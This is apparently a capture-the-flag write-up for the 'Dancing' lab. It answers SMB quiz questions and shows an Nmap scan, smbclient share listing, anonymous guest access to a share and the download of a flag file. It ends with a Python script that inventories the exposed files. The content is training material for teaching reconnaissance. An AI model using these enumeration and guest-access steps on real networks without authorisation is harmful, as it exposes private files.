Dancing (Protocols, SMB, Reconnaissance, Anonymous/Guest Access)


An SMB-enabled storage location on the network is called a share.

What does the 3-letter acronym SMB stand for?

  1. Server Message Block

What port does SMB use to operate at?

  1. 445

What is the service name for port 445 that came up in our Nmap scan?

  1. microsoft-ds

```
└─$ nmap -p- --min-rate 5000 -sV 10.129.182.2
Host is up (0.30s latency).
Not shown: 65172 closed tcp ports (conn-refused), 352 filtered tcp ports (no-response)
PORT      STATE SERVICE       VERSION
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
```

What is the 'flag' or 'switch' that we can use with the smbclient utility to 'list' the available shares on Dancing?

  1. -L

How many shares are there on Dancing?

  1. 4

```
└─$ smbclient -L <Target Ip>
```

What is the command we can use within the SMB shell to download the files we find?

  1. get

Submit flag

```
└─$ smbclient \\\\10.129.126.147\\WorkShares
Password for [WORKGROUP\kali]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Mon Mar 29 13:52:01 2021
  ..                                  D        0  Mon Mar 29 13:52:01 2021
  Amy.J                               D        0  Mon Mar 29 14:38:24 2021
  James.P                             D        0  Thu Jun  3 14:08:03 2021

                5114111 blocks of size 4096. 1749281 blocks available
smb: \> cd Amy.J\
smb: \Amy.J\> ls
  .                                   D        0  Mon Mar 29 14:38:24 2021
  ..                                  D        0  Mon Mar 29 14:38:24 2021
  worknotes.txt                       A       94  Fri Mar 26 16:30:37 2021

                5114111 blocks of size 4096. 1753024 blocks available
smb: \Amy.J\> cd ..
smb: \> cd James.P\
smb: \James.P\> ls
  .                                   D        0  Thu Jun  3 14:08:03 2021
  ..                                  D        0  Thu Jun  3 14:08:03 2021
  flag.txt                            A       32  Mon Mar 29 14:56:57 2021

                5114111 blocks of size 4096. 1753024 blocks available
smb: \James.P\> get flag.txt
getting file \James.P\flag.txt of size 32 as flag.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
smb: \James.P\> exit
```
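
The session above is what a guest login can read on WorkShares. As an added example (not part of the original walkthrough), this Python script parses an `smbclient` transcript in that format and inventories the files it exposes, which is the evidence a defender would record when reviewing guest access to a share; `exposed_files` and the two regexes are names chosen here, and the embedded transcript is an abridged copy of the listing above.

```python
import re
from datetime import datetime

# Abridged copy of the session shown above (single backslashes, as smbclient prints them).
TRANSCRIPT = r"""smb: \> ls
  .                                   D        0  Mon Mar 29 13:52:01 2021
  ..                                  D        0  Mon Mar 29 13:52:01 2021
  Amy.J                               D        0  Mon Mar 29 14:38:24 2021
  James.P                             D        0  Thu Jun  3 14:08:03 2021
smb: \> cd Amy.J\
smb: \Amy.J\> ls
  worknotes.txt                       A       94  Fri Mar 26 16:30:37 2021
smb: \Amy.J\> cd ..
smb: \> cd James.P\
smb: \James.P\> ls
  flag.txt                            A       32  Mon Mar 29 14:56:57 2021
                5114111 blocks of size 4096. 1753024 blocks available
"""

# Prompt line: "smb: <current directory>> <command>"
PROMPT = re.compile(r"^smb: (\\.*?)> ?(.*)$")
# Listing line: name, attribute letters, size in bytes, two spaces, timestamp
ENTRY = re.compile(
    r"^\s{2}(.+?)\s+([A-Z]+)\s+(\d+)\s{2}"
    r"(\w{3} \w{3} [ \d]\d \d\d:\d\d:\d\d \d{4})$")

def exposed_files(transcript):
    """Return (path, size, mtime) for every non-directory entry listed."""
    cwd, found = "\\", []
    for line in transcript.splitlines():
        prompt = PROMPT.match(line)
        if prompt:
            cwd = prompt.group(1)  # smbclient shows the current directory in its prompt
            continue
        entry = ENTRY.match(line)
        if not entry:
            continue  # free-space summary, banners, blank lines
        name, attrs, size, stamp = entry.groups()
        if name in (".", "..") or "D" in attrs:
            continue  # directories are not readable content themselves
        mtime = datetime.strptime(stamp, "%a %b %d %H:%M:%S %Y")
        found.append((cwd + name, int(size), mtime))
    return found

if __name__ == "__main__":
    for path, size, mtime in exposed_files(TRANSCRIPT):
        print(f"{path}\t{size} bytes\tmodified {mtime:%Y-%m-%d %H:%M}")
```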